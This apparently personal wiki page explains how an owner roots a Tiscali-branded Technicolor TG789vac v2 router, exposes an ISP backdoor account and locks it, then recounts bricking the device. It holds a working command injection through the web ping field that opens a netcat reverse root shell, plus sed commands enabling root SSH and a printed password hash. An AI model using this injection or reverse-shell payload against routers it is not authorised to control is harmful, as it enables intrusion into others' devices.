This is an old revision of the document!
Table of Contents
Rooting the router Technicolor TG789vac v2
This router DSL/FTTH Home router is running OpenWRT, it can bee rooted with few simple commands.
I tested the following procedure on a model shipped by Tiscali, an Italian Service Provider.
Product Vendor | Technicolor |
---|---|
Product Name | MediaAccess TG789vac v2 |
Software Version | 16.3 |
Firmware Version | 16.3.7636-2921002-20170419153951 |
Bootloader Version | 2.0.85 |
Hardware Version | VANT-6 |
The router default IP address is 192.168.1.1 (beware that it has a DHCP server enabled), web access is with admin login and admin password.
You need a PC connected on the same LAN (I used a GNU/Linux box), issue the following command on the PC:
nc -lvvp 1025
this will bind the TCP port 1025 and start listening for an incoming connection.
On the router you have to navigate the Dignostic tile, then the Ping & Traceroute tab. Inside the IP Address text input, write the following command just before clicking the Send Ping Request button:
:::::::;nc 192.168.1.46 1025 -e /bin/sh
the IP address must be the one of your PC. On the PC you will get a root shell. Use the passwd command to change the root password:
passwd Changing password for root New password: MySecret Retype password: MySecret Password for root changed by root
Finally you have to permaently enable the ssh access for the root user (but only from the LAN interface), copy and paste the following commands exactly:
sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd sed -i.save 's/0/1/' /etc/config/dropbear sed -i 's/off/on/' /etc/config/dropbear sed -i "s/wan/lan/" /etc/config/dropbear /etc/init.d/dropbear restart
OpenWRT
The installed OpenWRT will fetch packages from this URL:
http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz
which indeed brigs the Not Found error.
The Tiscali Backdoor
Once you got ssh access to the rotuer, you can confirm that there is a Tiscali backdoor, just look at the /etc/passwd file:
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
and at the /etc/shadow one:
tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::
The password is unknown, but it is an high security risk to have that account enabled on the Wan side (as it was the Dropbear SSH server, per default). Tiscaly surely knows that password, may be also some bad guy alread had cracked it, but you are not able to change or disable it.
This is enough to justify your right to have root privileges, and use them to lock-down the tiscali backdoor:
passwd -l tiscali
Router Bircked
I succeeded in bricking this router, may be after I installed the openvpn package, which required the kmod-tun one. I mixed packages from different architectures and sources, so probably I got some unworkable mix. It is probable that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to hard-reset the overlay.
There are two reset methods possibile:
- Power-off, keep the reset switch pressed, power-on. This method can be used to start the bootp procedure, which indeed can load and flash the stock firmware from a TFTP server. I done that, but the overlay partition is still messed and the router does not revive.
- Once the router is powered-on, press the reset switch for 7 seconds or more. The router should erase custom data and restart. Unfortunately this does not work for me, may be because the router is so messed-up, that the reset procedure does not even start.
I tried also to connect a serial adapter to the J5 tag, soldering three wires to it. TX and RX lines should correspond to R327 and R328 resistors, according to some posts. But I did not get any serial signal.